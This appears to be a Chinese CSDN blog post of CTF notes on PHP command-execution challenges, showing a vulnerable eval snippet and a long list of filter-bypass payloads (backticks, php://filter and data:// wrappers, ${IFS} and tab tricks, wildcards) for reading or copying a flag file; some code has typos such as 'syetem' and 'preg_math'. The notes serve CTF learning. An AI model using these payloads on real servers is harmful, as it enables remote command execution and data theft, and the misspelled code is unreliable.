命令执行

最新推荐文章于 2023-08-14 01:43:44 发布
最新推荐文章于 2023-08-14 01:43:44 发布
阅读量790 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/116563718
版权

命令执行

文件包含

源码

if(isset($_GET['c']))
{	
	$c = $_GET['c'];
	if(!preg_math("/flag/i,$c"))
	{	
			eval($c);
	}
}
else
{
	highlight_file(_FiLE_)
}

1.代码执行

?c=phpinfo(); 或者 ?c=phpinfo?>
php最后一条语句可以不用分号
?c=system(“cp fla?.php 1.txt”);
然后查看1.txt , fla?是因为过滤了flag所以拿占位符添加
(?是一位,*是多位)

如果过滤system

?c=`/cp fla?.php 1.txt`; 反引号在PHP中和system 类似

如过滤点单引号 和 点

?c=eval($_GET[1]);&1=system(“ls”);
后面的参数一不受过滤限制,逃逸了

过滤了分号 和 括号

?c=include%0a$_GET[1]?>&1=php://filter/convent.base64-encode/resource=flag.php
使用php伪协议,

过滤了include

?c=require%0a$_GET[1]?>&1=php://filter/convent.base64-encode/resource=flag.php
require 和include类似

过滤了数字

?c=include%0a$_GET[a]?>&a=php://filter/convent.base64-encode/resource=flag.php
a可以不用单引号,因为php向下兼容,目前可用,以后可能不行

过滤了很多符号

?c=print_r(get_defined_vars());
需要加一个post值里面写
拿一个中间一个数组
?c=print_r(next(get_defined_vars()));
取数组值弹出
?c=print(array_pop(get_defined_vars())));
执行
?c=eval(array_pop(get_defined_vars())));

利用函数echo print isset unset include require

print

print%0a$_GET[1]?>&1=phpinfo();
回显的是phpinfo()的字符
只有用eval才能执行

函数变了源代码eval变成include

include($c);

过滤了flag

?c=data://text/plain,<?php syetem("mv fla?.php 1.txt");?>
伪协议data把后面的字符作为代码执行 复制flag到1.txt

过滤了PHP

?c=data://text/plain,<?= syetem("mv fla?.php 1.txt");?>
php可以换成=号 这是短标签写法

强制加后缀PHP 并且不回显

?c=data://text/plain;<?php syetem("tac fla?.php");?>

include变成system

system($c,"	>/dev/null	2>&1");

需要url编码提交

双写绕过
?c=ls;ls
因为有分号第二个命令被拉到黑洞里

过滤了分号

?c=cat flag.php&&ls
同样是&分割了命令

过滤了cat.flag

?c=tac fla?.php&&ls

过滤了空格

?c=tac%09fla?.php&&ls
%09水平制表符 属于一种tab,可以当空格使用

过滤了所有空格

?c=nl<fla"g.php||ls
行号打开文件

过滤了<>

?c=ls${IFS}/||ls --查看根目录
?c=mv${IFS}fla?.php${IFS}a.txt||ls
?c=cp${IFS}/fla?.php${IFS}var/www/html/a.txt||ls

函数变成

d=system($c);
echo "<br>".$d

?c=ta"c${IFS}fla?.php

可利用函数

system('ls');
phpinfo();   php页面
echo shell_exec('ls')
echo file_get_contents('index.php'); 读取文件
echo include($_GET[1]);然后get传参?1=1=php://filter/convent.base64-encode/resource=flag.php
rename('flag.php' ,'1.txt');改变变量名字
echo include($_GET[1]);&1=hightlight_file('flag.php');
show_source('flag.php');
include('flag.php');&echo $flag; 先包含了,然后知道变量名字直接输出
include('flag.php');ver_dump(get_defined_var());包含变量,然后查看所有包含变量
print_r(scandir('.'));查看当前目录
file_get_contents('flag.php')远程文件获取
include('flag.txt'); txt文件直接输出
盖世大宝剑a
关注
回显命令执行-命令拼接+关键字绕过
asdfaa的博客
04-16 555
docker-compose.yml文件或者docker tar原始文件。docker-compose.yml文件或者docker tar原始文件。在linux shell中命令执行绕过关键字中,读取文件可以使用一下字符;主要过滤字符flag、cat、tac关键字,以及*,?
ctfshow 限时活动 红包挑战7和红包挑战8详细答案和见解
weixin_73562787的博客
08-14 261
这里的意思是extract()函数(传进来的必须是数组)来处理$_GET传入的参数,我起初一直在由于为什么,我传入的是value,name而不是value[],name[]为什么可以呢,是我太无知了。传入1=/usr/local/lib/php/extensions(是php扩展一个常见的默认安装目录)列出 /usr/local/lib/php/extensions/ 目录下的文件和子目录。函数这里思考了, 我们可以利用ini_set函数来暂时修改php.ini中的PHP配置 ,其中这里可以利用的方法是。
[CTFshow 红包挑战] 红包挑战7 Write up
Leaf_initial的博客
08-14 318
extract() 函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。第二个参数type用于指定当某个变量已经存在,而数组中又有同名元素时,extract() 函数如何对待这样的冲突。该函数返回成功导入到符号表中的变量数目。简单来说就是他可以接受我们的。
命令执行漏洞
qq_48904485的博客
03-21 2060
一、命令执行介绍 1、命令执行漏洞原理 命令执行漏洞定义:Web应用程序接收用户输入,拼接到要执行的系统命令执行。 产生原因: 1、用户输入未过滤或净化; 2、拼接到系统命令执行。 2、PHP下命令执行函数 在PHP中具有执行系统命令功能的函数如下: 1、system 2、exec 3、shell_exec 4、passthru 5、popen 6、proc_popen 7、`反引号 8、ob_start 9、mail函数+LD_PRELOAD执行系统命令 使用示例: L
php命令执行漏洞基础以及常用函数
Thunderclap的博客
02-22 575
说明:能够执行OS命令,但是该函数并不是返回命令结果,而是。说明:执行外部命令,与system()类似,但是该函数。说明:反引号[``]内的字符串,也会被解析成OS命令。禁用了shell_exec()同样反引号也无法使用。应用有时需要调用一些执行系统命令的函数,当服务器。说明:能够将字符串作为OS命令执行,自带输出功能。,可以加一个参数,即exec(ifconfig。说明:执行命令并以字符串的形式,返回。说明:能将字符串作为OS命令执行,,并且这个函数的运行参数是可控的。addslashes进行转义。
JDWP 远程命令执行 检查工具
04-26
JDWP 远程命令执行检查工具,JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都...
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
Linux学习 - 命令运行监测和软件安装
06-20
time 命令的输出结果中,real 代表命令开始至结束的时间,包括其它进程占用的时间片和 IO 时间,user 代表进程真正执行占用 CPU 的时间,sys 代表进程在内核中调用所消耗的 CPU 时间。 此外,top 命令也可以用来...
用vbs实现cmd多命令运行功能代码
09-30
标题中的“用vbs实现cmd多命令运行功能代码”指的是使用Visual Basic Script(VBS)编写脚本,以便在Windows的命令行界面(CMD)中连续执行多个DOS命令。这种技术在自动化任务或者需要批处理执行一系列操作的场景中...
cmdexec:使用 Apache Commons Exec 的示例外部命令执行实用程序
05-31
4. **Timeout**: 可以为命令执行设置超时,防止外部命令无限制地运行。超时后,可以优雅地终止进程。 5. **PumpStreamHandler**: 这个类用于将命令的输出流(包括标准输出和错误输出)泵送到指定的目标,比如 `...
每天一道ctf
whisper921的博客
10-28 1077
有这样一行代码
CTF命令执行小总结
n00bk1ng的博客
05-18 1783
文章目录简介命令执行常见命令及解释执行常见系统命令函数绕过姿势绕过总结函数套娃特殊题无字母无数字命令执行通过文件包含、文件上传拿shell进行命令执行FFI类型题例题ctfshow web31ctfshow web124 简介 命令执行 命令执行:攻击者可以通过web应用执行系统命令,从而获取敏感信息,甚至拿到shell权限等等,造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。 常见命令及解释 执行常见系统命令 常见的系统命令可以进行命令执行: awk 格式:awk'{printf
SQL注入过滤单引号是否无解
热门推荐
u012064609的专栏
12-18 2万+
sql注入攻击能够得逞,往往是因为前台页面传递的参数含有非法字符,导致sql原有逻辑发生改变。如经典的登录验证例子 程序处理:select * from tableXX where username
CTF中的命令执行绕过
蚁景网安学院
04-21 3295
作为CTF最基础的操作,命令执行的学习主要是为了以后进一步使用webshell打下基础
>/dev/null 2>&1
weixin_33674976的博客
07-31 236
os.system("/etc/init.d/winbind stop &gt;/dev/null 2&gt;&amp;1")&gt;/dev/null 将输出重定向到/dev/null,这是个空设备,也就是忽略其输出。 2&gt;&amp;1 是将错误输出到标准输出,如果在控制台调试,也就是屏幕上,方便调试。 有3个默认的i/o,0是标准输入,一般是键盘;1是标准输出,一般是屏幕了;2是标准错误...
linux中的分号&&和&,|和||说明与用法
qq_30339595的博客
01-03 434
“;”分号用法 方式:command1 ; command2 用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。 “| ”管道符用法 上一条命令的输出,作为下一条命令参数 方式:command1 | command2 Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的...
Shell中>/dev/null 2>&1和2>&1 >/dev/null
攻城狮Kevin
02-23 1547
在Linux系统中0,1,2是一个文件描述符: 0:system in,标准输入 1:system.out,标准输出 2:system.error,标准错误输出 >&是一个整体,2>&1指,将标准错误输出,重定向到标准输出中 >/dev/null 2>&1 本来1指向命令行打印, 执行>/dev/null后,标准输出1重定向到/...
引入flag.php文件,flag在php中咋解决
weixin_33982355的博客
03-10 2599
该楼层疑似违规已被系统折叠隐藏此楼查看此楼include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";...
基于opencv实现象棋识别及棋谱定位python源码+数据集-人工智能课程设计
最新发布
09-27
基于opencv实现象棋识别及棋谱定位python源码+数据集-人工智能课程设计,含有代码注释,满分课程设计资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 基于opencv实现象棋识别及棋谱定位python源码+数据集-人工智能课程设计,含有代码注释,满分课程设计资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 基于opencv实现象棋识别及棋谱定位python源码+数据集-人工智能课程设计,含有代码注释,满分课程设计资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。基于opencv实现象棋识别及棋谱定位python源码+数据集
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值